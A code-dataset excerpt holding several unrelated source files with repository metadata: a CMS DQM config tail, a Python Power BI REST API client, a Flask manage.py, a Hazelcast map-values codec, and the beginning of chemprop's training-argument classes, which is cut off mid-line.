process.siStripCMMonitor.FedIdVec = 100,200,400
process.siStripCMMonitor.PrintDebugMessages = 1
process.siStripCMMonitor.WriteDQMStore = True
process.siStripCMMonitor.DQMStoreFileName = "DQMStore_CM_run106019.root"
#process.siStripCMMonitor.TimeHistogramConfig.NBins = 100
#process.siStripCMMonitor.TimeHistogramConfig.Min = 0
#process.siStripCMMonitor.TimeHistogramConfig.Max = 1
process.load('PerfTools.Callgrind.callgrindSwitch_cff')
process.TFileService = cms.Service("TFileService",
fileName = cms.string("Shot_run106019.root"),
closeFileFast = cms.untracked.bool(True)
)
process.p = cms.Path( #process.profilerStart*
process.siStripDigis
*process.siStripZeroSuppression
*process.apvshotsanalyzer
*process.siStripCMMonitor
#*process.profilerStop
)
process.saveDigis = cms.OutputModule(
"PoolOutputModule",
outputCommands = cms.untracked.vstring(
'drop *_*_*_HLT',
'drop *_*_*Raw_DQMCMMonitor',
'drop *_*_ScopeMode_DQMCMMonitor',
'keep *_siStripDigis_ZeroSuppressed_*',
'keep *_source_*_*'
),
fileName = cms.untracked.string('Digi_run106019.root')
)
process.pout = cms.EndPath( process.saveDigis )
| 40.683099
| 118
| 0.691189
|
9026d04f8a2b56a049194654fef6c4c03c854ba1
| 18,339
|
py
|
Python
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 3
|
2020-03-02T19:46:51.000Z
|
2022-03-24T03:42:31.000Z
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 1
|
2022-03-15T21:25:44.000Z
|
2022-03-15T21:25:44.000Z
|
pbirest/core.py
|
AntoineDW/powerbi-rest-api-python
|
d836c07a048ea82e8e5404323d5e947cc979a223
|
[
"MIT"
] | 1
|
2021-07-01T19:48:39.000Z
|
2021-07-01T19:48:39.000Z
|
import requests
import datetime
import logging
import re
token = { "bearer": None, "expiration": None }
credentials = { "client_id": None, "username": None, "password": None, "tenant_id": None, "client_secret": None }
log = logging.getLogger()
console = logging.StreamHandler()
console.setFormatter(logging.Formatter("%(asctime)s\t%(levelname)s -- %(message)s"))
log.addHandler(console)
log.setLevel(20)
HTTP_OK = 200
HTTP_ACCEPTED = 202
def connect(client_id: str, username: str, password: str, tenant_id: str = "common", client_secret: str = None) -> None:
global token
global credentials
if client_secret:
body = {
"grant_type": "password",
"resource": "https://analysis.windows.net/powerbi/api",
"client_id": client_id,
"client_secret": client_secret,
"username": username,
"password": password
}
else:
body = {
"grant_type": "password",
"resource": "https://analysis.windows.net/powerbi/api",
"client_id": client_id,
"username": username,
"password": password
}
headers = { "Content-Type": "application/x-www-form-urlencoded" }
response = requests.post("https://login.microsoftonline.com/{}/oauth2/token".format(tenant_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
set_credentials(client_id, username, password, tenant_id, client_secret)
set_token(response.json()["access_token"])
log.info("Connected to the Power BI REST API with {}".format(username))
else:
set_credentials(None, None, None, None, None)
set_token(None)
log.error("Error {} -- Something went wrong when trying to retrieve the token from the REST API".format(response.status_code))
def verify_token() -> bool:
global token
if token["bearer"] == None:
log.error("Error 401 -- Please connect to the Power BI REST API with the connect() function before")
return False
else:
if token["expiration"] < datetime.datetime.now():
connect(credentials["client_id"], credentials["username"], credentials["password"], credentials["tenant_id"], credentials["client_secret"])
return True
else:
return True
def get_token() -> dict:
global token
return token
def set_token(bearer: str) -> None:
global token
token["bearer"] = "Bearer {}".format(bearer)
token["expiration"] = datetime.datetime.now() + datetime.timedelta(hours = 1)
def set_credentials(client_id: str, username: str, password: str, tenant_id: str, client_secret: str) -> None:
global credentials
credentials["client_id"] = client_id
credentials["username"] = username
credentials["password"] = password
credentials["tenant_id"] = tenant_id
credentials["client_secret"] = client_secret
# Workspace
def get_workspaces() -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups", headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of workspaces you have access".format(response.status_code))
return None
def get_workspace(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups", headers = headers)
if response.status_code == HTTP_OK:
ws = [result for result in response.json()["value"] if result["id"] == workspace_id]
if(len(ws) > 0): return ws[0]
else: return None
else:
log.error("Error {} -- Something went wrong when trying to retrieve the workspace {}".format(response.status_code, workspace_id))
return None
def create_workspace(workspace_name: str, new: bool = False) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
body = { "name": workspace_name }
if new:
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups?workspaceV2=True", headers = headers, data = body)
if response.status_code == HTTP_OK:
result = response.json()
return { "id": result["id"], "isOnDedicatedCapacity": result["isOnDedicatedCapacity"], "name": result["name"] }
else:
log.error("Error {} -- Something went wrong when trying to create a new workspace V2 called {}".format(response.status_code, workspace_name))
return None
else:
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups", headers = headers, data = body)
if response.status_code == HTTP_OK:
result = response.json()
return { "id": result["id"], "isReadOnly": result["isReadOnly"], "isOnDedicatedCapacity": result["isOnDedicatedCapacity"], "name": result["name"] }
else:
log.error("Error {} -- Something went wrong when trying to create a new workspace called {}".format(response.status_code, workspace_name))
return None
def delete_workspace(workspace_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the workspace {}".format(response.status_code, workspace_id))
return None
def get_users_in_workspace(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of users in the workspace {}".format(response.status_code, workspace_id))
return None
def add_user_to_workspace(workspace_id: str, email: str, access: str = "Member") -> dict:
global token
if(not verify_token()): return None
if(access in ["Admin", "Contributor", "Member"]):
headers = { "Authorization": token["bearer"] }
body = { "userEmailAddress": email, "groupUserAccessRight": access }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to add {} in the workspace {}".format(response.status_code, email, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the access parameter is either \"Admin\", \"Contributor\" or \"Member\"")
return None
def delete_user_from_workspace(workspace_id: str, email: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/users/{}".format(workspace_id, email), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the user {} from the workspace {}".format(response.status_code, email, workspace_id))
return None
def update_user_in_workspace(workspace_id: str, email: str, access: str = "Member") -> dict:
global token
if(not verify_token()): return None
if(access in ["Admin", "Contributor", "Member"]):
headers = { "Authorization": token["bearer"] }
body = { "userEmailAddress": email, "groupUserAccessRight": access }
response = requests.put("https://api.powerbi.com/v1.0/myorg/groups/{}/users".format(workspace_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to update {} in the workspace {}".format(response.status_code, email, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the access parameter is either \"Admin\", \"Contributor\" or \"Member\"")
return None
# Report
def get_reports(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of reports in the workspace {}".format(response.status_code, workspace_id))
return None
def get_report(workspace_id: str, report_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()
else:
log.error("Error {} -- Something went wrong when trying to retrieve the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
def delete_report(workspace_id: str, report_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
def export_report(workspace_id: str, report_id: str, out_file: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}/export".format(workspace_id, report_id), headers = headers)
if response.status_code == HTTP_OK:
with open(out_file, "wb") as file: file.write(response.content)
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to export the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
def import_report(workspace_id: str, report_name: str, in_file: str, name_conflict: str = "CreateOrOverwrite") -> dict:
global token
if(not verify_token()): return None
if(name_conflict in ["CreateOrOverwrite", "GenerateUniqueName", "Ignore", "Overwrite"]):
headers = { "Authorization": token["bearer"], "Content-Type": "multipart/form-data" }
file = { "file": open(in_file, "rb") }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/imports?datasetDisplayName={}&nameConflict={}".format(workspace_id, report_name, name_conflict), headers = headers, files = file)
if response.status_code == HTTP_ACCEPTED:
return response.json()
else:
log.error("Error {} -- Something went wrong when trying to import the report {} in the workspace {}".format(response.status_code, in_file, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the name_conflict parameter is either \"CreateOrOverwrite\", \"GenerateUniqueName\", \"Ignore\" or \"Overwrite\"")
return None
def clone_report(workspace_id: str, report_id: str, dest_report_name: str, dest_workspace_id: str = None) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
if dest_workspace_id: body = { "name": dest_report_name, "targetWorkspaceId": dest_workspace_id }
else: body = { "name": dest_report_name }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/reports/{}/clone".format(workspace_id, report_id), headers = headers, data = body)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to clone the report {} in the workspace {}".format(response.status_code, report_id, workspace_id))
return None
# Dataset
def get_datasets(workspace_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets".format(workspace_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the list of datasets in the workspace {}".format(response.status_code, workspace_id))
return None
def get_dataset(workspace_id: str, dataset_id: str) -> list:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.get("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id), headers = headers)
if response.status_code == HTTP_OK:
return response.json()["value"]
else:
log.error("Error {} -- Something went wrong when trying to retrieve the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
def delete_dataset(workspace_id: str, dataset_id: str) -> dict:
global token
if(not verify_token()): return None
headers = { "Authorization": token["bearer"] }
response = requests.delete("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id), headers = headers)
if response.status_code == HTTP_OK:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to delete the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
def refresh_dataset(workspace_id: str, dataset_id: str, notify_option: str = "NoNotification") -> dict:
global token
if(not verify_token()): return None
if(notify_option in ["MailOnCompletion", "MailOnFailure", "NoNotification"]):
headers = { "Authorization": token["bearer"] }
body = { "notifyOption": notify_option }
response = requests.post("https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshes".format(workspace_id, dataset_id), headers = headers, data = body)
if response.status_code == HTTP_ACCEPTED:
return { "response": response.status_code }
else:
log.error("Error {} -- Something went wrong when trying to refresh the dataset {} in the workspace {}".format(response.status_code, dataset_id, workspace_id))
return None
else:
log.error("Error 400 -- Please, make sure the notify_option parameter is either \"MailOnCompletion\", \"MailOnFailure\" or \"NoNotification\"")
return None
# Admin
def get_audit_logs(start_date: str, end_date: str, activity: str = None, user_id: str = None) -> list:
global token
if(not verify_token()): return None
date_regex = r"^\d\d\d\d-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01]) (00|1[0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])$"
start_date_verification = re.search(date_regex, start_date)
end_date_verification = re.search(date_regex, end_date)
if(start_date_verification and end_date_verification):
start_date_value = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S.000Z")
end_date_value = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S.000Z")
headers = { "Authorization": token["bearer"] }
params = ""
if activity:
params += "Activity eq '{}'".format(activity)
if user_id:
if params != "": params += " and "
params += "UserId eq '{}'".format(user_id)
if params == "": url = "https://api.powerbi.com/v1.0/myorg/admin/activityevents?startDateTime='{}'&endDateTime='{}'".format(start_date_value, end_date_value)
else: url = "https://api.powerbi.com/v1.0/myorg/admin/activityevents?startDateTime='{}'&endDateTime='{}'&$filter={}".format(start_date_value, end_date_value, params)
response = requests.get(url, headers = headers)
if response.status_code == HTTP_OK:
logs = []
while(response.json()["continuationUri"] != None):
logs += response.json()["activityEventEntities"]
response = requests.get(response.json()["continuationUri"], headers = headers)
if response.status_code != HTTP_OK:
log.error("Error {} -- Something went wrong when trying to retrieve audit logs from {} to {}".format(response.status_code, start_date, end_date))
return None
return logs
else:
log.error("Error {} -- Something went wrong when trying to retrieve audit logs from {} to {}".format(response.status_code, start_date, end_date))
print(response.json())
return None
else:
log.error("Error 400 -- Please, make sure the dates you gave match the following pattern: YYYY-MM-DD HH:MM:SS")
return None
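# A minimal usage sketch (not part of the original module). The client id and
# credentials are placeholders; connect() has to succeed before any other
# helper returns data.
if __name__ == "__main__":
    connect(client_id="00000000-0000-0000-0000-000000000000",
            username="user@example.com",
            password="changeme")
    workspaces = get_workspaces()
    if workspaces:
        first_workspace_id = workspaces[0]["id"]
        print(get_reports(first_workspace_id))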
| 45.733167
| 208
| 0.658378
|
d7166501c5e7cb157a9a49fbd794284066fed44e
| 776
|
py
|
Python
|
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
manage.py
|
skazi0/car-stats
|
e643ed47dfb90094fcc8663bce90b879af31b546
|
[
"MIT"
] | null | null | null |
from flask_script import Manager, Server
from flask_migrate import Migrate, MigrateCommand
from app import app, db
from app.models import User
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
manager.add_command('runserver', Server(host='0.0.0.0', port=22778))
@manager.command
def create_db():
"""Creates the db tables."""
db.create_all()
@manager.command
def drop_db():
"""Drops the db tables."""
db.drop_all()
@manager.command
def create_admin():
"""Creates the admin user."""
db.session.add(User(email='ad@min.com', password='admin', admin=True))
db.session.commit()
@manager.command
def create_data():
"""Creates sample data."""
pass
if __name__ == '__main__':
manager.run()
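# With Flask-Script, each @manager.command function above becomes a CLI
# sub-command named after the function, so typical (illustrative) invocations
# look like:
#   python manage.py create_db
#   python manage.py create_admin
#   python manage.py runserver
#   python manage.py db migrate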
| 18.926829
| 74
| 0.69201
|
e956124bb37469c715e66eacdee2a51d8d21cd88
| 1,258
|
py
|
Python
|
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/map_values_codec.py
|
murdockn/hazelcast-python-client
|
597d90be5414cd56340fafcff916191704dcb86d
|
[
"Apache-2.0"
] | null | null | null |
from hazelcast.serialization.bits import *
from hazelcast.protocol.client_message import ClientMessage
from hazelcast.protocol.custom_codec import *
from hazelcast.util import ImmutableLazyDataList
from hazelcast.protocol.codec.map_message_type import *
REQUEST_TYPE = MAP_VALUES
RESPONSE_TYPE = 106
RETRYABLE = False
def calculate_size(name):
""" Calculates the request payload size"""
data_size = 0
data_size += calculate_size_str(name)
return data_size
def encode_request(name):
""" Encode request into client_message"""
client_message = ClientMessage(payload_size=calculate_size(name))
client_message.set_message_type(REQUEST_TYPE)
client_message.set_retryable(RETRYABLE)
client_message.append_str(name)
client_message.update_frame_length()
return client_message
def decode_response(client_message, to_object=None):
""" Decode response from client message"""
parameters = dict(response=None)
response_size = client_message.read_int()
response = []
for response_index in xrange(0, response_size):
response_item = client_message.read_data()
response.append(response_item)
parameters['response'] = ImmutableLazyDataList(response, to_object)
return parameters
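# A minimal encoding sketch (not part of the original codec). It only exercises
# the request side, which needs nothing but a map name; decoding needs a real
# server response, so it is not shown here.
if __name__ == "__main__":
    name = "my-distributed-map"
    print("payload size: %d" % calculate_size(name))
    request = encode_request(name)  # ready to be handed to the client's connection layer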
| 29.952381
| 71
| 0.769475
|
439d146a52f6562d82801e660fca9e8f9cb2e101
| 20,447
|
py
|
Python
|
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | 1
|
2022-02-12T06:39:32.000Z
|
2022-02-12T06:39:32.000Z
|
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | null | null | null |
chemprop/args.py
|
anonymous20201002/chemprop
|
3e36f6a3bb36194366feadb31be94dfc7e98fd91
|
[
"MIT"
] | null | null | null |
import json
import os
from tempfile import TemporaryDirectory
import pickle
from typing import List, Optional, Tuple
from typing_extensions import Literal
import torch
from tap import Tap # pip install typed-argument-parser (https://github.com/swansonk14/typed-argument-parser)
from chemprop.features import get_available_features_generators
def get_checkpoint_paths(checkpoint_path: Optional[str] = None,
checkpoint_paths: Optional[List[str]] = None,
checkpoint_dir: Optional[str] = None,
ext: str = '.pt') -> Optional[List[str]]:
"""
    Gets a list of checkpoint paths from a single checkpoint path, a list of checkpoint paths, or a directory of checkpoints.
If :code:`checkpoint_path` is provided, only collects that one checkpoint.
If :code:`checkpoint_paths` is provided, collects all of the provided checkpoints.
If :code:`checkpoint_dir` is provided, walks the directory and collects all checkpoints.
A checkpoint is any file ending in the extension ext.
:param checkpoint_path: Path to a checkpoint.
:param checkpoint_paths: List of paths to checkpoints.
:param checkpoint_dir: Path to a directory containing checkpoints.
:param ext: The extension which defines a checkpoint file.
:return: A list of paths to checkpoints or None if no checkpoint path(s)/dir are provided.
"""
if sum(var is not None for var in [checkpoint_dir, checkpoint_path, checkpoint_paths]) > 1:
raise ValueError('Can only specify one of checkpoint_dir, checkpoint_path, and checkpoint_paths')
if checkpoint_path is not None:
return [checkpoint_path]
if checkpoint_paths is not None:
return checkpoint_paths
if checkpoint_dir is not None:
checkpoint_paths = []
for root, _, files in os.walk(checkpoint_dir):
for fname in files:
if fname.endswith(ext):
checkpoint_paths.append(os.path.join(root, fname))
if len(checkpoint_paths) == 0:
raise ValueError(f'Failed to find any checkpoints with extension "{ext}" in directory "{checkpoint_dir}"')
return checkpoint_paths
return None
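# Illustrative call patterns for the helper above (the paths are placeholders,
# not files known to exist in this repository):
#   get_checkpoint_paths(checkpoint_path='model.pt')        -> ['model.pt']
#   get_checkpoint_paths(checkpoint_paths=['a.pt', 'b.pt']) -> ['a.pt', 'b.pt']
#   get_checkpoint_paths(checkpoint_dir='ckpts/')           -> every '*.pt' file found under ckpts/
#   get_checkpoint_paths()                                  -> None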
class CommonArgs(Tap):
""":class:`CommonArgs` contains arguments that are used in both :class:`TrainArgs` and :class:`PredictArgs`."""
smiles_column: str = None
"""Name of the column containing SMILES strings. By default, uses the first column."""
checkpoint_dir: str = None
"""Directory from which to load model checkpoints (walks directory and ensembles all models that are found)."""
checkpoint_path: str = None
"""Path to model checkpoint (:code:`.pt` file)."""
checkpoint_paths: List[str] = None
"""List of paths to model checkpoints (:code:`.pt` files)."""
no_cuda: bool = False
"""Turn off cuda (i.e., use CPU instead of GPU)."""
gpu: int = None
"""Which GPU to use."""
features_generator: List[str] = None
"""Method(s) of generating additional features."""
features_path: List[str] = None
"""Path(s) to features to use in FNN (instead of features_generator)."""
no_features_scaling: bool = False
"""Turn off scaling of features."""
max_data_size: int = None
"""Maximum number of data points to load."""
num_workers: int = 8
"""Number of workers for the parallel data loading (0 means sequential)."""
batch_size: int = 50
"""Batch size."""
@property
def device(self) -> torch.device:
"""The :code:`torch.device` on which to load and process data and models."""
if not self.cuda:
return torch.device('cpu')
return torch.device('cuda', self.gpu)
@device.setter
def device(self, device: torch.device) -> None:
self.cuda = device.type == 'cuda'
self.gpu = device.index
@property
def cuda(self) -> bool:
"""Whether to use CUDA (i.e., GPUs) or not."""
return not self.no_cuda and torch.cuda.is_available()
@cuda.setter
def cuda(self, cuda: bool) -> None:
self.no_cuda = not cuda
@property
def features_scaling(self) -> bool:
"""Whether to apply normalization with a :class:`~chemprop.data.scaler.StandardScaler` to the additional molecule-level features."""
return not self.no_features_scaling
def add_arguments(self) -> None:
self.add_argument('--gpu', choices=list(range(torch.cuda.device_count())))
self.add_argument('--features_generator', choices=get_available_features_generators())
def process_args(self) -> None:
# Load checkpoint paths
self.checkpoint_paths = get_checkpoint_paths(
checkpoint_path=self.checkpoint_path,
checkpoint_paths=self.checkpoint_paths,
checkpoint_dir=self.checkpoint_dir,
)
# Validate features
if self.features_generator is not None and 'rdkit_2d_normalized' in self.features_generator and self.features_scaling:
raise ValueError('When using rdkit_2d_normalized features, --no_features_scaling must be specified.')
class TrainArgs(CommonArgs):
""":class:`TrainArgs` includes :class:`CommonArgs` along with additional arguments used for training a Chemprop model."""
# General arguments
data_path: str
"""Path to data CSV file."""
target_columns: List[str] = None
"""
Name of the columns containing target values.
By default, uses all columns except the SMILES column and the :code:`ignore_columns`.
"""
ignore_columns: List[str] = None
"""Name of the columns to ignore when :code:`target_columns` is not provided."""
dataset_type: Literal['regression', 'classification', 'multiclass']
"""Type of dataset. This determines the loss function used during training."""
multiclass_num_classes: int = 3
"""Number of classes when running multiclass classification."""
separate_val_path: str = None
"""Path to separate val set, optional."""
separate_test_path: str = None
"""Path to separate test set, optional."""
split_type: Literal['random', 'scaffold_balanced', 'predetermined', 'crossval', 'index_predetermined'] = 'random'
"""Method of splitting the data into train/val/test."""
split_sizes: Tuple[float, float, float] = (0.8, 0.1, 0.1)
"""Split proportions for train/validation/test sets."""
num_folds: int = 1
"""Number of folds when performing cross validation."""
folds_file: str = None
"""Optional file of fold labels."""
val_fold_index: int = None
"""Which fold to use as val for leave-one-out cross val."""
test_fold_index: int = None
"""Which fold to use as test for leave-one-out cross val."""
crossval_index_dir: str = None
"""Directory in which to find cross validation index files."""
crossval_index_file: str = None
"""Indices of files to use as train/val/test. Overrides :code:`--num_folds` and :code:`--seed`."""
seed: int = 0
"""
Random seed to use when splitting data into train/val/test sets.
    When :code:`num_folds > 1`, the first fold uses this seed and all subsequent folds add 1 to the seed.
"""
pytorch_seed: int = 0
"""Seed for PyTorch randomness (e.g., random initial weights)."""
metric: Literal['auc', 'prc-auc', 'rmse', 'mae', 'mse', 'r2', 'accuracy', 'cross_entropy'] = None
"""Metric to use during evaluation. Defaults to "auc" for classification and "rmse" for regression."""
save_dir: str = None
"""Directory where model checkpoints will be saved."""
save_smiles_splits: bool = False
"""Save smiles for each train/val/test splits for prediction convenience later."""
test: bool = False
"""Whether to skip training and only test the model."""
quiet: bool = False
"""Skip non-essential print statements."""
log_frequency: int = 10
"""The number of batches between each logging of the training loss."""
show_individual_scores: bool = False
"""Show all scores for individual targets, not just average, at the end."""
cache_cutoff: int = 10000
"""
Maximum number of molecules in dataset to allow caching.
Below this number, caching is used and data loading is sequential.
Above this number, caching is not used and data loading is parallel.
"""
# Model arguments
bias: bool = False
"""Whether to add bias to linear layers."""
hidden_size: int = 300
"""Dimensionality of hidden layers in MPN."""
depth: int = 3
"""Number of message passing steps."""
dropout: float = 0.0
"""Dropout probability."""
activation: Literal['ReLU', 'LeakyReLU', 'PReLU', 'tanh', 'SELU', 'ELU'] = 'ReLU'
"""Activation function."""
atom_messages: bool = False
"""Centers messages on atoms instead of on bonds."""
undirected: bool = False
"""Undirected edges (always sum the two relevant bond vectors)."""
ffn_hidden_size: int = None
"""Hidden dim for higher-capacity FFN (defaults to hidden_size)."""
ffn_num_layers: int = 2
"""Number of layers in FFN after MPN encoding."""
features_only: bool = False
"""Use only the additional features in an FFN, no graph network."""
separate_val_features_path: List[str] = None
"""Path to file with features for separate val set."""
separate_test_features_path: List[str] = None
"""Path to file with features for separate test set."""
config_path: str = None
"""
Path to a :code:`.json` file containing arguments. Any arguments present in the config file
will override arguments specified via the command line or by the defaults.
"""
ensemble_size: int = 1
"""Number of models in ensemble."""
# Training arguments
epochs: int = 30
"""Number of epochs to run."""
warmup_epochs: float = 2.0
"""
Number of epochs during which learning rate increases linearly from :code:`init_lr` to :code:`max_lr`.
Afterwards, learning rate decreases exponentially from :code:`max_lr` to :code:`final_lr`.
"""
init_lr: float = 1e-4
"""Initial learning rate."""
max_lr: float = 1e-3
"""Maximum learning rate."""
final_lr: float = 1e-4
"""Final learning rate."""
grad_clip: float = None
"""Maximum magnitude of gradient during training."""
class_balance: bool = False
"""Trains with an equal number of positives and negatives in each batch (only for single task classification)."""
def __init__(self, *args, **kwargs) -> None:
super(TrainArgs, self).__init__(*args, **kwargs)
self._task_names = None
self._crossval_index_sets = None
self._task_names = None
self._num_tasks = None
self._features_size = None
self._train_data_size = None
@property
def minimize_score(self) -> bool:
"""Whether the model should try to minimize the score metric or maximize it."""
return self.metric in {'rmse', 'mae', 'mse', 'cross_entropy'}
@property
def use_input_features(self) -> bool:
"""Whether the model is using additional molecule-level features."""
return self.features_generator is not None or self.features_path is not None
@property
def num_lrs(self) -> int:
"""The number of learning rates to use (currently hard-coded to 1)."""
return 1
@property
def crossval_index_sets(self) -> List[List[List[int]]]:
"""Index sets used for splitting data into train/validation/test during cross-validation"""
return self._crossval_index_sets
@property
def task_names(self) -> List[str]:
"""A list of names of the tasks being trained on."""
return self._task_names
@task_names.setter
def task_names(self, task_names: List[str]) -> None:
self._task_names = task_names
@property
def num_tasks(self) -> int:
"""The number of tasks being trained on."""
return len(self.task_names) if self.task_names is not None else 0
@property
def features_size(self) -> int:
"""The dimensionality of the additional molecule-level features."""
return self._features_size
@features_size.setter
def features_size(self, features_size: int) -> None:
self._features_size = features_size
@property
def train_data_size(self) -> int:
"""The size of the training data set."""
return self._train_data_size
@train_data_size.setter
def train_data_size(self, train_data_size: int) -> None:
self._train_data_size = train_data_size
def process_args(self) -> None:
super(TrainArgs, self).process_args()
global temp_dir # Prevents the temporary directory from being deleted upon function return
# Load config file
if self.config_path is not None:
with open(self.config_path) as f:
config = json.load(f)
for key, value in config.items():
setattr(self, key, value)
# Create temporary directory as save directory if not provided
if self.save_dir is None:
temp_dir = TemporaryDirectory()
self.save_dir = temp_dir.name
# Fix ensemble size if loading checkpoints
if self.checkpoint_paths is not None and len(self.checkpoint_paths) > 0:
self.ensemble_size = len(self.checkpoint_paths)
# Process and validate metric and loss function
if self.metric is None:
if self.dataset_type == 'classification':
self.metric = 'auc'
elif self.dataset_type == 'multiclass':
self.metric = 'cross_entropy'
else:
self.metric = 'rmse'
if not ((self.dataset_type == 'classification' and self.metric in ['auc', 'prc-auc', 'accuracy']) or
(self.dataset_type == 'regression' and self.metric in ['rmse', 'mae', 'mse', 'r2']) or
(self.dataset_type == 'multiclass' and self.metric in ['cross_entropy', 'accuracy'])):
raise ValueError(f'Metric "{self.metric}" invalid for dataset type "{self.dataset_type}".')
# Validate class balance
if self.class_balance and self.dataset_type != 'classification':
raise ValueError('Class balance can only be applied if the dataset type is classification.')
# Validate features
if self.features_only and not (self.features_generator or self.features_path):
raise ValueError('When using features_only, a features_generator or features_path must be provided.')
# Handle FFN hidden size
if self.ffn_hidden_size is None:
self.ffn_hidden_size = self.hidden_size
# Handle MPN variants
if self.atom_messages and self.undirected:
raise ValueError('Undirected is unnecessary when using atom_messages '
'since atom_messages are by their nature undirected.')
# Validate split type settings
if not (self.split_type == 'predetermined') == (self.folds_file is not None) == (self.test_fold_index is not None):
raise ValueError('When using predetermined split type, must provide folds_file and test_fold_index.')
if not (self.split_type == 'crossval') == (self.crossval_index_dir is not None):
raise ValueError('When using crossval split type, must provide crossval_index_dir.')
if not (self.split_type in ['crossval', 'index_predetermined']) == (self.crossval_index_file is not None):
raise ValueError('When using crossval or index_predetermined split type, must provide crossval_index_file.')
if self.split_type in ['crossval', 'index_predetermined']:
with open(self.crossval_index_file, 'rb') as rf:
